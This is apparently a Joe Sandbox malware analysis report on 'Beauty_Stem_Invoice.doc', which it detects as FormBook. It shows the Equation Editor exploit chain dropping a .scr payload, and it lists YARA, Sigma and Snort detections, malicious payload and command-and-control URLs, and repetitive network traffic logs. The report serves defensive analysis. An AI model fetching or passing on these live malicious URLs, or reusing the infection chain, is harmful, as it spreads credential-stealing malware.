Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Beauty_Stem_Invoice.doc

Overview

General Information

Sample name:Beauty_Stem_Invoice.doc
Analysis ID:1441061
MD5:85ce759ae69a9334137db1334bf51bd0
SHA1:b10f803d0140ca39c4510249e3931b2347b05522
SHA256:bec93506d8753d87a08aae20208e8b763891bd0b7c86cd82121fb0b03feacd28
Tags:doc
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic
Yara detected FormBook
.NET source code references suspicious native API functions
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1036 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2396 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • op33779.scr (PID: 1216 cmdline: "C:\Users\user\AppData\Roaming\op33779.scr" MD5: E81883368313FC5B3CC4D1F1F1889827)
        • op33779.scr (PID: 3104 cmdline: "C:\Users\user\AppData\Roaming\op33779.scr" MD5: E81883368313FC5B3CC4D1F1F1889827)
          • gpgLFpElQuxhEi.exe (PID: 2768 cmdline: "C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • dfrgui.exe (PID: 3232 cmdline: "C:\Windows\SysWOW64\dfrgui.exe" MD5: FB036244DBD2FADC225AD8650886B641)
              • gpgLFpElQuxhEi.exe (PID: 2824 cmdline: "C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 3644 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
    • EQNEDT32.EXE (PID: 3244 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Beauty_Stem_Invoice.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1591c:$obj2: \objdata
  • 0x15939:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.628678228.0000000000220000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.628678228.0000000000220000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2b3c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1523f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000008.00000002.628640163.00000000001A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.628640163.00000000001A0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2b3c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1523f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000C.00000002.628854731.00000000009D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.op33779.scr.1c0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.op33779.scr.1c0000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dc03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17a82:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          5.2.op33779.scr.30a6390.4.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6b46b:$x1: In$J$ct0r
          5.2.op33779.scr.30a6390.4.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6d26b:$x1: In$J$ct0r
          6.2.op33779.scr.1c0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 5 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Equation Editor Network Connection
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 172.67.175.222, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2396, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
            Sigma detected: Suspicious Microsoft Office Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\op33779.scr", CommandLine: "C:\Users\user\AppData\Roaming\op33779.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\op33779.scr, NewProcessName: C:\Users\user\AppData\Roaming\op33779.scr, OriginalFileName: C:\Users\user\AppData\Roaming\op33779.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2396, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\op33779.scr", ProcessId: 1216, ProcessName: op33779.scr
            Sigma detected: SCR File Write Event
            Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2396, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opszx[1].scr
            Sigma detected: Suspicious Screensaver Binary File Creation
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2396, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opszx[1].scr
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2396, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Office Macro File Creation
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1036, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

            Snort Signatures

            Timestamp:05/14/24-09:38:13.513349
            SID:2855465
            Source Port:49177
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/14/24-09:37:54.389325
            SID:2855465
            Source Port:49173
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/14/24-09:36:48.683420
            SID:2855465
            Source Port:49164
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/14/24-09:37:39.935286
            SID:2855465
            Source Port:49169
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://covid19help.top/opszx.scrjAvira URL Cloud: Label: malware
            Source: https://covid19help.top/opszx.scrAvira URL Cloud: Label: malware
            Source: http://www.terelprime.com/ufuh/?f6=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&kjBDU=ZblXcjBhGAvira URL Cloud: Label: malware
            Source: https://covid19help.top/opszx.scrjjC:Avira URL Cloud: Label: malware
            Source: https://covid19help.top/tcAvira URL Cloud: Label: malware
            Source: https://covid19help.top/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: covid19help.topVirustotal: Detection: 26%Perma Link
            Source: https://covid19help.top/Virustotal: Detection: 26%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Beauty_Stem_Invoice.docVirustotal: Detection: 40%Perma Link
            Source: Beauty_Stem_Invoice.docReversingLabs: Detection: 44%
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.op33779.scr.1c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.op33779.scr.1c0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.628678228.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.628640163.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.628854731.00000000009D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.477556208.0000000000270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401593026.00000000002A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.628611973.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401776618.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opszx[1].scrJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\op33779.scrJoe Sandbox ML: detected

            Exploits

            barindex
            Office equation editor establishes network connection
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 172.67.175.222 Port: 443Jump to behavior
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\op33779.scr
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\op33779.scrJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 172.67.175.222:443 -> 192.168.2.22:49163 version: TLS 1.2
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: op33779.scr, 00000005.00000002.354405964.0000000001DD0000.00000004.08000000.00040000.00000000.sdmp, op33779.scr, 00000005.00000002.354434353.0000000002031000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dfrgui.pdb source: gpgLFpElQuxhEi.exe, 00000007.00000003.388534971.0000000000870000.00000004.00000001.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 00000007.00000003.388698667.00000000009C0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gpgLFpElQuxhEi.exe, 00000007.00000002.628862520.0000000000B4E000.00000002.00000001.01000000.00000008.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000000.414395638.0000000000B4E000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: dfrgui.pdb2D source: gpgLFpElQuxhEi.exe, 00000007.00000003.388534971.0000000000870000.00000004.00000001.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 00000007.00000003.388698667.00000000009C0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: op33779.scr, op33779.scr, 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.401548955.0000000001E30000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.401907663.0000000001F90000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.628890620.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.628890620.0000000002120000.00000040.00001000.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Source: global trafficDNS query: name: covid19help.top
            Source: global trafficDNS query: name: www.besthomeincome24.com
            Source: global trafficDNS query: name: www.terelprime.com
            Source: global trafficDNS query: name: www.sqlite.org
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.99b6q.xyz
            Source: global trafficDNS query: name: www.kinkynerdspro.blog
            Source: global trafficDNS query: name: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS query: name: www.primeplay88.org
            Source: global trafficDNS query: name: www.aceautocorp.com
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 54.38.220.85:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 194.9.94.86:80
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 91.195.240.19:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
